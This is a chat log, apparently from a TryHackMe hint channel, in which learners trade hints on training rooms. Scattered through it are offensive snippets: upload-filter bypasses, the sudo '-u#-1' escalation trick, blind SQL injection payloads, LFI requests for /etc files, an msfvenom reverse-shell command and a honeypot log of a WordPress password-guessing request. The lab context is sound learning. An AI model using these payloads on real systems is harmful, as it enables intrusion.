#room-hints

it's in the same directory, and I can open the file too

is this powershell?

yup

.\ means "execute"

so instead, try doing "8702.zip" instead

tried, it isn't working as well

same output?

yup

now I tried in cmd as well

same outpu

did you change rockyou1.txt aswell?

yup

with and without rockyo

and remember to quote it aswell

hmm

is this file in hashcat-6.2.3 directory?

yup

the same directory as hashcat.exe

Thanks, I am all set. I downloaded the sensitive file by typing the path in the browser. I assume you can't ssh to the machine?

Gave +1 Rep to @left thunder

Not sure, but I think you can not.

Why zip?

I just finished room/uploadvulns, and I have a question about methodology (Task 10 item 3). We are asked: What's the naming scheme of the website? In the Task 11 ctf (jewel), the target tells us it wants a jpg. But the naming scheme is given to us in the gobuster wordlist. How would we find the file naming scheme in a real-world hack?

if it wants a photo, then it should accept jpg files so, you can rename them to shell.jpg.php or if it doesn't work shell.jpg.phP or phP5, if it checks for magic bytes. Then add jpg magic bytes into the request using burp

Thanks, but the problem is that the target renames the upload file using some naming scheme ending in jpg. How do we enumerate it without a wordlist?

I don't have knowledge about that, sorry if i couldn't help you. I'm still learning

Me too! I appreciate the effort.

To address my own question: Maybe we can't solve the ctf without knowing that the upload file name is upper-case alphabetic three chars in length. I can accept that and move on.

In the OWASP top 10 room, I can't get the script to work - https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3

It's all json and js, no python.

Oh, i've been there too

sec ill drop it

@pseudo tapir

Dont forget to change the ip

Currently doing the Inclusion CTF room. The gobuster brute-force attack seems to be taking ages. I was wondering if there was a way to increase the speed or if it's just like this.

I did read somewhere about increasing the amount threads but apparently that can decrease the accuracy.

This is the command I used btw :)

Use thread, iirc the command is -t 50 for 50 thread

You're the best, thanks!

Gave +1 Rep to @silent narwhal

anyone able to assist with wget connection refused?

-Wrong hostname / port.
-You don't have a server setup on your side, or at least on the right port.
-Outbound connections not allowed on the target.

...

im typing in what the questions is asking me but everytime it comes back with connection refused...

I gotta go now, but ill revisit at some point soon

and hopefully either work it out or be back here

but thanks

Hello some hints for the pickle rick room dont give me the answer just give me some hints if posssible thnx in advance

which task?

What room and/or task?

Pickle Rick

ctf

the name of the room is Pickle Rick

yes, and which part you want to get the hint?

is it for root, recon, enumerate, etc

for the first part

Do you have a foothold on the system?

can you tell us what attempt you have tried?

i tried gobuster first i find a login page and then i try to bruteforce login page(sniper attack burp suite) with the username that i found in the code but with no sucess

have you check all directories you found with gobuster?

enumeration is the key

Bruteforce is not usually the way to go. Consider that for future machines.

thnx y very much i will give another try

i found one other directory but it needs authentication

check all directories you found with gobuster

ok i will give another try and i will reach you again thnx you very much

glhf

https://tenor.com/view/robot-attack-saturday-night-live-help-me-evil-robot-attacking-robot-gif-18069713

Standing in front of each door is a robot guard. With no other way out of the room, you must choose a door to enter.

forgot to mention, directories and files. do rescan and add extension scan on your gobuster command

@misty orchid Cool gif?

If I connect to another system using an ssh key, will it still ask for a password before finishing the connection? I think I did this right, just wanna make sure.

ssh-keygen
place public key within /.ssh/authorized_keys
ssh -i keyfile user@host

I finished the connection, but I already knew the password, I was just testing if I understood the process

nvm, google is fren

yea 🙂

Figured it out then?

not yet but i am close

In Upload Vulnerabilities room Task 11 : Whenever I comment out or delete the Client Side Checks and forward the request in Burp , I no longer have the ability to upload any files the button doesnt work at all not sure why ..

Someone will get to ya man. I havent gotten there yet. Goin back over the first few rooms atm

yea i figured it out i logged in

https://tenor.com/view/baby-dancing-celebrate-happy-cute-babya-gif-5112194

ahhahahah exactly 🙂 🙂

https://tryhackme.com/room/encryptioncrypto101

Trying to modify the config file so that I can use key authentication rather than password for linux2. Cant save the file.

Managed to get everything else done, but it still requires a password, and I cannot disable the option 😐

@stuck fractal I think I am doing it right, I dont think I have permissions on this box to do what the crypto room is saying.

ooh maybe I can change permissions, i am root xD

Im not root...

Trying to modify the config file so that I can use key authentication rather than password for linux2. It's enabled by default....

You don't need to change any config files

grrrr, why the hell is it still telling me to use a password. I have the authorized_keys in .ssh with 700 permissions on directory, 600 on its contents

THROWS HANDS IN AIR

lol

if I did what I think I did.. ima cry

I have atleast 40 derps a day

Make sure you specify the key when you're SSHing in, if it's not in ~/.ssh/id_algorithmGoesHere

I got that part, and it isnt the derp I thought it was

correct key within authorized_keys

Proper permissions?

end of key = so nightshade is the login name correct?

use my private key, and it wants a password

try with full path, but shouldnt need it since Im already in .ssh

Am I missing something? If so Ill come back to it later, or is something not workin right?

Did you create a user called nightshade on the target machine? Have you set a password when you generated the key files?

i set a passphrase, but it doesnt work

i did not create that user on the other system.... If thats the problem..... ffs. attention to detail I lack..

Into which users folder did you put it then? linux2 user?

yes linux2, i tried linux2@ip and same thing tho

Mh

dont have permission to change the user

create**

oh ffs

I think I might no

again

i fixed it

Wait, linux 2 user has already an ssh login set up, right? Did you remove that key ?

Oh okay, what was it?

the user is tryhackme the box is linux3

linux2

....

Ah okay

welp that was a fun 3 hours. lmfao moving on

ty tho

Not a problem 🙂

prob why ninja went quite. thinking "FAhking idiot"

Thank you kindly, bot please rep @stuck fractal and @left thunder

Gave +1 Rep to @stuck fractal

word

https://tenor.com/view/baby-dancing-celebrate-happy-cute-babya-gif-5112194

i found a way to get root privelleges with this command sudo -u#-1 /bin/bash :):)

"sudo"

😑

I mean there could be situations where that would work tho. Current user is sudoer, but doesnt have access to a directory you need, and root does. I think? Dx

then its not being "priv esc"

Why not, you are gaining privileges to access a directory you were previously unable to access

I mean I get the funnies, but still.

You have access for it.

you didnt previously tho

just add sudo before the command

can permissions not be set in a way that only one user can view them tho. Sometimes even sudo wont get you there. or am I wrong

nvm, a root user can change to any other user without the password. So, even though you can technically set permissions so that root cannot view them, nothing stops root from moving to the other account. >.<

I just wanted to give an unlikely, but possible situation, but I just ended up lookin like a dummy Dx

then basically using the sudo giving you more privileges while you are in the user account, and the owner?

I dont follow. I mean kinda, not really. lol.

set a file so only the user can read. so like 600.

That doesn't make sense

Only the user can read and write. So would root need to move to that account to see it?

no?

ok

lmfao

what to do with that about priv esc

ye, I get what you are saying.

priv deescalation is what I meant >.<

not really. Just dumb

@stuck fractal Scam link ↑

is there a place to discuss completed rooms with spoilers? (for rooms older than the recent releases)

In the Owasp top 10 room, for task 29, 'Components with Known vulnerabilities - Lab', the instructions are: 'The following is a vulnerable application' What application are they referring to?

It's the target machine you deploy

Has vulnerability, it wants you to find and exploit it

It's a bookstore

You need to search to the exploit for the version and name

For example : "A CMS" is name of a bookstore and its version is 1.4, then you need to search for "A CMS 1.4 exploit"

If you find a version 1.4 or 1.4+, you can exploit it

Any hints for pickle rick second ingredient?

What have you tried so far?

i found the second incredient asci text but i cannot open it because it is no a file

You should be able to open it. Bear in mind spaces when opening a file with a space in the name.

ok thnx i will give a try again

i found it it was so easy lol i am noob any hints now for the third ingredient?

What did you try so far?

Honestly nothing i tried with burp suite to intercept the request for any useful information but i do not found anything interest

You have a web shell that allows you to execute commands. You were able to find the second ingredient by doing enumeration on the target.

If after checking the filesystem with your current access you are unable to find it, maybe you should consider trying to move to another account.

You can move to accounts with your same privilege, or with higher privileges (privilege escalation).

i took root acess with this commmand "sudo -u#-1 /bin/bash"and i have access to ssh keys am i close?

What you did was spawning a new bash session, but bear in mind you won't be able to interact with it since you are still on a web shell.

On the other side that trick "sudo -u#-1 /bin/bash" is used to exploit vulnerable versions of sudo, but it's not needed for this machine.

There's one command you should always run when getting access to a machine in order to list your sudo permissions. Then based on that, you might be able to execute certain or any commands.

ok thnx i will give it a try and i will reach you again if i have any clarifications

Sure no problem.

Was looking at the walkthroughs for https://tryhackme.com/room/ustoun
They all refer to mysql service however the port is closed when I port scan the machine

I read the forum in the past, and apparently other users were facing the same problem. I haven't been able to solve that machine because the port wouldn't just open, even after waiting 15 minutes.

Some users reported the port would open after 15 minutes. Maybe try waiting a bit to see if it opens up . . .

@gleaming viper thank you very much. Will try to wait a bit.

And check again

Gave +1 Rep to @gleaming viper

Wireshark 101, Task 7, ARP Traffic

Last question, I'm required to find IP address at specific MAC, i used eth.src == mac_address and arp, from that i get 5 different ip addresses, i can guess which one is correct by the template of the hidden answer but i dont understand how is there multiple ip addresses that i get?

I tried it and i got the correct one, but it still doesn't solve my problem

Hi guys, I'm onto Agent Sudo and i dont knw what task 3 is talking about
any help here?

Anybody?

which part? there are multiple questions

That want me to change User-Agent

you mean task 2?

Task 2, question 3

to get the correct user agent, the hint provided is good enough iirc

sure, sure.... it is

Thanks.

Things got clear just now

good to hear

glhf

i am doing bolt and metasploit is saying target is not bolt application

I know i chose the right exploit

ends with this in metasploit bt_******

still not understand yet why should we run use the bash -p to do for some privileges escalate, any one help please??

When we use only "bash" command
It runs with the privileges of the current user
It's like just changing shells for work
By using -p, it runs with the privs of the owner (when it have suid permissions)
Mostly root

I learnt about that yesterday while making a write-up for the skynet room haha

thx! 😙

Hi. I was working on the Overpass 3 room, and was not able to upload a reverse shell. Every time I try to upload one, it says "553 Could not create file."

I was uploading the reverse shell from FTP

You sure the revshell is located at your specified path?Also maybe try to change into the folder where the revshell is located as I'm not sure if you can just specify paths to files within ftp, rather then just being in the same directory already, and then connect via ftp, so that you only have to use put revshell.php instead of with the path itself.

I kept it in the same folder , and it worked. Don't know why tho. In FTP you can specify full paths like that, and that file was present in that path too. Not sure why it didn't work earlier. Thanks for your help. A lesson learnt lol. Will add it to my notes for sure, lol.

Gave +1 Rep to @left thunder

guys I’m going tomghost room

Little stuck on privesc part

Can somebody help me

Any hints

Can you share what part you're stuck on?

With the pgp thing. I tried to decrypt it but it ask for passphrase

Here

Hi

Hlo

i need help with hacker of the hill medium port 80

i feel we have to do something with those 2 files on sky

anyone available for a hint/sanity check for the CCT2019 room? Still attempting task1 but I feel stuck

hey guys

has anyone done the lockdown lab?

I am confused, since I only see ssh and http installed

should I brute force the password, or do url scraping

Take what I say with a grain of salt cuz I'm still semi new to all this but it sounds like you should be using your browser for this one. At least in the beginning

this should help: #893575174916542465 😉

have you finished it?

can someone give me a hint about Lockdown room?

got a reverse shell as www-data

can't figure out how to escalate privs to user.

What can you do as www-data

What info might you have access to?

i have gone through the www/html found nothing interesting

or maybe it's sitting right there, but I can't see it lol
found a password hash, but I don't think it's on any use

tried cracking it, it's still running BTW

It should be pretty quick

You may have misidentified it

cracking the hash?

When you spend more time than usual trying to crack a hash, the reason might be you are using the wrong hash format in your cracking efforts. That's why you should run hashid -mj yourhash before, just in case.

yea I know, it's just that I was trying to crack the wrong hash,

now I am on the right path

Name that hash is a better tool@peak harness

I didn't know that one. Thank you for sharing.

Gave +1 Rep to @ashen scaffold

can i get a nudge for year of the jelly fish

i need help with Lockdown i have user but i need help with root

#893575174916542465

Linux fundamentals part 2

will not allow me to type any text for password

Specifically which task of linux fundamentals are you trying to complete?

If it is the initial SSH into the machine, when you type in a password, you won't actually 'see' the characters (or *******) as you're typing

Hi, I'm doing the room : You're in a cave insane and I'm stuck in the moment of modifying the /etc/hosts to be able to access the /varr/www
What should I do?

Yes thank you! A Mod in another room helped me. TY for responding! And helping😊

You are welcome - have a nice day and have fun 🙂

TY CapOneCode!

I think that gets everyone who is hard-headed! After trying every key and wasting time I decided to ask for help

Hard-headed could also be called persistence or grit 😉

That I am! Thx again👍

Hello all! I am new to TryHackMe and I'm having a slight issue I'm hoping someone can help me with. I'm in the Linux Fundamentals room part 1. When I open the terminal it is opening as root, but in the video it shows it opening as user 'tryhackme' How to I get the terminal to open to the user and not root?

on your local machine/vm ?

you dont need to specifically i would say

First, terminate all of the machines you deployed. Then Click here: https://media.discordapp.net/attachments/522158539129618453/893459338767777812/unknown.png

It's likely not an issue you need to worry about

can i get a nudge for year of the jelly fish

Yeah, which part are you in?

Hey guys, I'm trying to finish the Task 7 of Network Services room and connect connect back from victim telnet machine to my attacking box. What I'm doing wrong?
https://ibb.co/XWwPPcz

Try restarting the target machine

The telnet connection isn't working properly. When you connect, it should say ||SKIDYS BACKDOOR||

Can I get a hint for "File Inclusion" part of the "introduction to web hacking" , I'm stuck at challenge #2 "capture the flag2 at /etc/flag2" . || I changed the cookie properly to get the page as admin rather than guest || . I therefore get the message || Welcome admin , this is a admin page! Get the flag! || I tried to apply from burp suite some GET or POST trying to get the flag2 but nothing happens , what can i do ?

I'm not sure what room/task you're doing, but from what your saying it sounds like you need to send a get request to that directory. Also, make sure it actually says /etc/flag because /etc likely can't can't requested cuz its above to root of the website, unless an etc dir was made specifically for that task

Hint is cookie bro

Thank you @waxen mica ! It worked after target machine restart!

Gave +1 Rep to @waxen mica

Hey guys. Really need help with Task8 "Capture Flag3 at /etc/flag3" question here. It looks like that there is '/' filtration that I can't bypass. I literally tried all lfi cheet sheets already, but no success. https://tryhackme.com/room/fileinc

@slate siren Why not use an earlier LFI challenge and download the code for challenge 3 and look at what it is doing? 🙂

thank you for this hint lol, I can't believe I did not try this. I was searching way too far hehe

Gave +1 Rep to @grand idol

could use some assistance please. I've been hard at it but cannot figure out what I'm doing wrong here. I am working on: Network Services 2 - Section 3 - Enumerating NFS.
https://tryhackme.com/room/networkservices2#

Active Machine IP: 10.10.115.132
Attack Machine IP: 10.10.194.19

I am on this part:

"Time to mount the share to our local machine!

First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.

Then, use the mount command we broke down earlier to mount the NFS share to your local machine."

root@kali:/tmp/mount# sudo mount -t nfs 10.10.194.19:share /tmp/mount/ -nolock

mount.nfs: requested NFS version or transport protocol is not supported

The sharename "share" is just an example, that's not the real sharename for that machine.

Need push with "SQL Injection" room
https://tryhackme.com/room/sqlinjectionlm
Task 8 Blind SQLi - Time Based, got database name and stuck on tables querry... 😦

SQL Query
select * from analytics_referrers where domain='admin123' union select sleep(1),2 FROM information_schema.tables WHERE table_schema = '##########' and table_name like '%';--' LIMIT 1

After typing dozens of verbs at it, later some emotive ones to, I found that 'format' is the obscure answer to this one. 'Formatting' probably more correct, but there you go.

m stuck too

It is practically the same system like in the task before. Just with "admin123' UNION SELECT SLEEP(5),2 " at the beginning 🙂

https://tryhackme.com/room/burpsuiterepeater Any idea about task 7

I have literally used intruder from 1 to 1000 with ascii decode, url encode and html encode

How can I find the flag ? I have even tried sql injection and xss payloads

are you making sure that you only send the data to the right field/part of the post request????

POST ?

It is using get request

http://<machine ip>/products/{payload}

http://10.10.179.9/products/1 like this

???

the field where I have to inject is {payload}

it says use extreme inputs instead of integer here in this field

Same challenge here, do you have more insight?

guys which is the last flag on Network Services 2 task 4 last question

i tried everything

and still not getting root

./bash: line 7: syntax error near unexpected token newline' ./bash: line 7: <!DOCTYPE html>'

only thing i get

@trim haven can you help me

?

The bash file isn’t working

Try using the one on the box

Copy it to the place you need it and then execute the commands on it

where is it located?

/bin/bash ?

ok

https://i.imgur.com/EaUus7d.png

still not working

great

FINALLY

worked

I still can't figure this out 🥺🥺🥺🥺

this room is all about Repeater.
what does it have to do with intruder? I mean you don't need intruder to do this task.

pay more attention to this message:

See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs.

try negative numbers (you should always consider unordinary numbers (such as big or negatives) when facing this situations).

thanks

what about imagineary numbers????

on it has already said integers

ah fairs

this is it

😆😆😆😆

This is priceless. Whomever built the Uranium CTF room, you are my hero today:

Broadcast message from root@uranium (somewhere) (Tue Oct  5 23:07:49 2021):    
                                                                               
That is not nano, sending the cops, bye!

Then it nuked the machine.

I can't stop laughing.

Anyone doing new Cross-Site Scripting room?

Just finished it, whats up?

can i dm you?

Sure thing

thanks now it 's completed

Gave +1 Rep to @prime willow

Hey guys! I am using Kali-Linux and when i try to open the website the machine is connected to (for vulnriversity) it just gives me a "Cant connect" Error, yes i am connected to the openVPN

"Secure Connection failed"

Fixed it!

Hi guys! I'm doing the OWASP juice shop. In the section about XSS I have to modify a header value in burp suite, but my burp suite version doesn't have the option to change the header. Do I need to change some option in burp?

It won't be an option. Headers are part of the request. If you intercept the request with burp you can change the headers

Ok, I'll try the intercept again then. Thank you!

Gave +1 Rep to @waxen mica

Hey guys, I'm doing IntroductionToHoneypots. I'm currently stuck on :

What application is being targetted in the first sample? (Tunnelling/Sample1.txt)

Any suggestions on how to read the file or where to learn to read the file?

2021-03-17T10:09:51.052837Z [SSHChannel cowrie-discarded-direct-tcpip (62) on SSHService b'ssh-connection' on HoneyPotSSHTransport,118939,0.0.0.0] discarded direct-tcp forward request 62 to <A DOMAIN>:80 with data b'POST /xmlrpc.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: <A DOMAIN>\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36\r\n\r\n<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11\r</value></param></params></methodCall>'

so this is the log from Sample1.txt
you can see it contains a HTTP request inside. extract this request which looks like below:

POST /xmlrpc.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: keep-alive\r\nContent-Length: 201\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: <A DOMAIN>\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36\r\n\r\n<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11\r</value></param></params></methodCall>

in order to make it more human readable you can interpret those new lines using echo -e

POST /xmlrpc.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Host: <A DOMAIN>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36

</value></param></params></methodCall>hodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password11

so what does it look like?

Thank you for showing me the simplification. Also how did you post a block of text on discord as an image like that?

EDIT: NVM got it

Gave +1 Rep to @modest timber

it's not an image it's called code blocks.

Any Help? Room Linux Agency root@ec96850005d6:/root# cat success.txt
47 you made it!!!

You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.

Good Luck Amigo!

NVM Got it.

Hi, i need help for the new SQL injection room, at the task 8 (blind sqli Time-Based).

I almost found the entire table but i can't find any extra characters and if i do a simple "=" on the name of the table i think i found, it doesn't work.

Can someone help me ?

Refer it to #room-help and as somebody helped me u can get help from the source too

B0X Linux Agency Done, finally

table name has 2 words, divided with "" (underscore) 😉
I found a flaw: at first try I guessed database name as "sqli__" (sqli + 5x underscore sign),
https://website.thm/analytics?referrer=admin123' UNION SELECT sleep(2),2 where database() like 'sqli____';-- *(sqli + 5x underscore sign), Discord hides 5x "_"

Yes i have found it when look at the query, but now i can't enumerate the users with any value set whatever the columns chosen

same here 🙂 I got columns and stucked... for a while 😉

I am stuck on Introduction To Honeypots, Task 7 Q1.
"What brand of device is the bot in the first sample searching for? (BotCommands/Sample1.txt)".
Can someone please give me a hint?

#895404687354900540

I'm stuck on the Agent Sudo CTF. I've enumerated as much as I can think of at the moment (which is hardly anything lol.) The ports for SSH, FTP and HTTP are open. I can't access the FTP server yet due to a lack of credentials but the web server yielded very useful information:

|| Dear agents, Use your own codename as user-agent to access the site. From, Agent R||

Gobuster didn't find anything so the only thing I can think of is a hidden directory. But I don't understand how to get to it with this information. I've tried things like adding "/user-agentr" and "/user-agent" to the end of the URL but to no avail. I can't think of anywhere else to try this. 😔

I also don't want to look at a write-up this time as it's not something that is beyond my ability as far as I'm aware :P

Look into what flags you can use with the curl command

hmm okok

If youre reading this, then know you too have been marked by the overlords...😆

In the question "Provide the amount of DNS connections made in total for this packet capture." of Masterminds room , I have tried several figures based on results but none of them work for me... I am left with this question -.-

DM me if you're still stuck

Im a noob and very confused by the Burp Suite OWASP Juice Shop room. I am up to Task 8 and have added the target IP to the scope in BURP and disabled interceptor. I just get a blank page that asked me to accept a cookie, i did so and now its just blank. Task 8 starts by telling me to attempt to log in, showing me an image of an "account" button that doesnt seem to exist. Any hints are appreciated, even just telling me what i am seeing is expected would help lol

#masterminds hey guys, does anyone finished the Masterminds room?
if you have pls give me some hints where i want to start?

Maybe this will help 🙂
https://www.youtube.com/watch?v=InT-7WZ5Y2Y

im stuck after found and decode JSON cookie

Ok, I think kali likely already has the .xxa filename I'm looking for on it but I'm trying to go about this as if I didn't already think it did.

Can someone point me to a place where can I find some good wordlists looking for 5 and 8 character .xxa filenames without all numbers

I just realized I need a 4 char filename not a 5 since the "." in .xxa counts as a character...

The room CC:Pentesting doesn't give any hint as to which wordlist I need to use to use gobuster to find an .xxa filename. It looks like by the eight grey * in the answer box that its either a four (including .xxa) or an 8 character so I'm trying to make one I think will work. I just tried all the 5 letter filenames in the gobuster file extensions. I guess I'll go back and try the four character ones

Are you sure that's Masterminds? I don't see any questions about decoding a cookie

okay I tried every four letter word in dirbuster wordlists folder i'm close to giving up. I even found the .htaccess.xxa type files but none of those are the right answer

Which room

cc:pentesting

The .xxa isn't in the answer

good enough hint. thank you

Hello everyone, anyone doing the new Jason room?

Ok thank you so much

Gave +1 Rep to @prime willow

maybe i went too far:/

i am trying but no luck

Hi everyone! Running a Linux Agency task, went to the user robert, got the password id_rsa, but I can't connect through id_rsa, the error is like this

└─$ ssh robert@10.10.60.185 -i id_rsa
Enter passphrase for key 'id_rsa': 
Connection closed by 10.10.60.185 port 22

Who can tell me which way to go and what I did wrong?

i think its closed by the server, maybe its the same as the ftp when you try to \\ip\user, you have to specify the user with the flag for it to let you acces it

Are you sure you're supposed to be sshing?

i tried, but i stuck at payload step, if i send 'process.exit()' everything going as expected, but if i try smth with connection(send request to post.bin or connect to my netcat server) nothing work

And just checked that payload work with sleep function, that's mean smth wrong with socket/http functions, any hints?

My hint is to check the same process that was explained in the previous task to find the weak password.

Hai

Hi guys in linux part 2 section i have an assignment to switch users

it says that my password is not assigned when i switch it to user2

Yes, i can't complete the last task

hello I am doing burp suite : Intruder room and I can't get past task 11, I set numbers 1-100 but I don't get any 200 results

just one

Im doing the room agent sudo.
I've used stegoveritas on the 2 pictures that has hidden messages.
From one of the pictures I got a .txt file with a message in it saying :

However, the other file didnt give me anything of interest, as far as I understand. But I realise I might be missing something here.

THM is asking for the "steg password". And I'm not sure how to continue this room. Any hints?

try to find out who WXJlYTUx is

Hi, doing CC: Pen Testing room Section 4- John The Ripper. Been trying to crack the hash (md5) but can't seem to do so and keep getting 'using default input encoding: UTF-8 No password hashes loaded

Hi everyone, I'm in the room Metasploit can someone help me I'm trying to exploit but the message is " ip:8000 - exploit failed unreachable

A lot of the time you have to set the format manually when using john

just one hint, just be sure that you use VPN ip, victim machine can't connect to internet

im also stuck in the sql injection room, i've got the table names but i have tried a ton of different stuff and cant really find the answer

i'm taking a break from it now but any syntax advice would be appreciated 🙂

hello I am doing burp suite : Intruder room and I can't get past task 11, I set numbers 1-100 but I don't get any 200 results
just one

forgot to mention im stuck on task 8, the time based task

Is there anyone who got the same problem and solved this

Care to elaborate?

I mean in this room

Can you verify and then send screenshot of show options

!docs verify

in the Alfred room -- for the initial foothold on the box, are we supposed to be brute forcing?

it mentions a nishang script, but I have been looking those over and I'm not really sure how I would gain initial access with it

hello I am doing burp suite : Intruder room and I can't get past task 11, I set numbers 1-100 but I don't get any 200 results
just one

don't brute-force alfred, btw

Loool

hello discord friends, I am kinda of stuck on a question, well the command. i am watching a youtube video as well. something isn't quite right. This section i am on is Network services 'Exploiting Telnet' the command .... msfvenom -p cmd/unix/reverse_netcat lhost=(IP address) lport= (i have watched too different videos one with the port 4444 or 4545) .............. i am not getting the right reply back compared to the youtube videos

What words does the generated payload start with?'

The port in the command needs to be the same in the listener.

Ok thank you 🙏🏻

Gave +1 Rep to @mossy hazel

uuum should this not be in #895404687354900540

Gave +1 Rep to @alpine kestrel

no problem

Hi all, I'm working on the Daily Bugle, I can't get the user, who can give me a tip on how to get the user

Iv went waaaay down the rabbit hole with nmap in the netsec challenge who can reinf be back in the correct direction. I understand its to be stealthy lol

hi i need a hint with one task in windows fundamentals part 2, task 3

At what time every day is the GoogleUpdateTaskMachineUA task configured to run?

i cant find the task in the task scheduler

what i found is a task called "GoogleUpdateTaskMachineCore" with run time at 6:15:30 am, but my answer is in this pattern "?:?? ??"

hello, any hints on the net sec challenge, task 2, IDS evasion?

packet count goes up no matter if i am scanning or not

Which question? I don't see one related to IDS

oh, ive got it, thanks!

🍻

Hope to get a nug here

I am working on "File Inclusion Module" and I am at the last part.

Lab#challenge-1

It says I need to change my request to POST and use the file as a parameter. So I open up bur and I catch the request.

I send it to Repeater and change the GET to POST and add file=../etc/flag1

So the URL looks lik e http://10.10.201.207/challenges/chall1.php?file=../etc/flag1

I took it to curl to see if I can do it like some thing like

curl -X POST http://10.10.201.207/challenges/chall1.php?file=/etc/flag1

I assume I am on the right track but as I keep failing maybe I am missing something or overlooking something any ideas would be great thanks jedis.

the "/" needs to be encoded in Repeater

or change the method using developer tool

You da man

After playing around Chrome as an option to re submit the request

Chanced sutff there got me to see the flag thank again

I did it threw the developer tool

Im working through the SMB tasks in the Network Services room of the Complete Beginner pathway. I downloaded an id_rsa private key file and changed the permissions chmod 600 id_rsa and the next task is to "use the service and key to log-in to the server". I'm lost as to how to do that. I've added the keys to my ssh folder but don't know how to use the keys for authentication into the target machine. Any hints?

u can use ssh key for it

do u know the user name?

hello

can someone explain what the protocol security negotiation error means

in xfreerdp

Google is your friend here. Ya gotta get used to using Google as a first resource in this field

It could be many things. I never had great luck with FreeRDP. I would suggest Remmina (https://remmina.org/).

turns out remmina as based on FreeRDP shows the same exact error

i couldn't understand the term protocol security negotiation

maybe it's related to certificates or something

Hmmm.. A quick google search shows tons of hits. You could go down the list and see if anything matches your problem.
Or fire up a fresh VM install RDP client of choice and see if a fresh install changes anything.

hello im working on wreath room i downloaded the first key(id_rsa) from the first machine ( web server but when i try to ssh i get this permission error )

which error?

ssh -i rsa root@<ip> 255 ⨯
Load key "rsa": invalid format
root@<ip>: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

hmm not sure but invalid format could mean something went wrong while copying the key

i tired copy paste and meterpreter download both i get same error .

dont understand what you meant by meterpreter download

how did you receive the key?

As in the Wreath network?

im doing wreath and theres a relay server between the target server. target is running wsman on the standard port

evil-winrm works fine

Is the file named rsa or is it named with some added characters?

Could someone hint on the HackPark challenge?

yeah i know the username

If someone has completed the Redline room that was just added today, can someone share how they set up the "Memory, Disk, System, Network, and Other" in the "View and Edit Your Script for Windows" for IOC Search Collector for Task 6? Given the hint for one of the question in Task 6, it says to look at "PE Info," but that is not even available to be viewed.

ok so the command would be ssh -i file username@ip

thats what I was forgetting. the -i switch. thanks!

Gave +1 Rep to @modest flicker

Hello, Quick (first ever) question about room "Network Services 2) Exploiting NFS. When running the BASH file, i get the following Error: cappucino@polonfs:~$ ./bash -p
./bash: line 1: syntax error near unexpected token <' ./bash: line 1: <html><body>You are being <a href="https://github.com/polo-sec/writing/blob/master/Security Challenge Walkthroughs/Networks 2/bash">redirected</a>.</body></html>'

is this an error consistent with a permissions issue, or is the script is the BASH file I'm supposed to use creating the error on its own.

Thank you in advance for your insight.

ur welcome

im stuck

._.

its uh with the metasploit room

can u tell me the prob

I'm not sure what you're trying to do here, but from what it looks like, you tried to put html in a bash script?

That won't run for obvious reasons

no sir, i simply ran the bash with ./bash -p as instructed.

@waxen mica

when i ran the bash through my VM natively, i got a similar 'redirect error'.

https://tryhackme.com/room/networkservices2 Task 4, exploiting NFS.

but it sounds like at least it's not an issue with the permissions.

so that's a plus.

Thank you for your reply.

https://github.com/TheRealPoloMints/Blog/blob/master/Security Challenge Walkthroughs/Networks 2/bash

that's the bash shell it's asking me to run.

Did you use wget to download that bash file?

i did not. i used curl -o

(slaps head)

that's a good idea, and i will try it later.

Well to me it looks the bash file you downloaded is not right. So to download stuff from github with wget(maybe same for curl) you have to use the raw link, otherwise you will have html elements in your file, which will then give you errors if you run it. So the raw link for that file would be: https://github.com/polo-sec/writing/blob/master/Security Challenge Walkthroughs/Networks 2/bash?raw=true

Thank you for that. i've re-downloaded the BASH and renamed it to BASH from BASH?raw=true

i'll re-run the course and report back if that solved the issue.

Thank you.

Hi fam, any hints on Netsec challenge on ftp nonstandard port

Hey, if you've scanned the target, you should have the answer somewhere in the output 😉

yes, thanks for the response buddy 🙂 got it already 😄

Gave +1 Rep to @prime willow

I'm stuck at the 3rd flag in the blue room

please help

nvm got it

congratz on getting it

so theres this task "
A very useful output format: how would you save results in a "grepable" format? "

i did nmap -H

theres no info about this

the answer was -oG

but i found this by googling

why isnt it on nmap manual or help

it is in the man nmap page

nmap -H is just a short introduction and not the full nmap manual that you get from the command man

if it is not maybe you have an old version..... or you were just unlucky and missed it

It is I the manual page. But you also don't always need to read the manual. Finding the answer on Google is a good thing

You will always need to be able to find answers on google

Even as a profesional

would anyone know why this pass is not working

Why are you SSHing into that machine?

what should i do instead ?

thats what i have done in my linux fundamentals

no need on that task probably

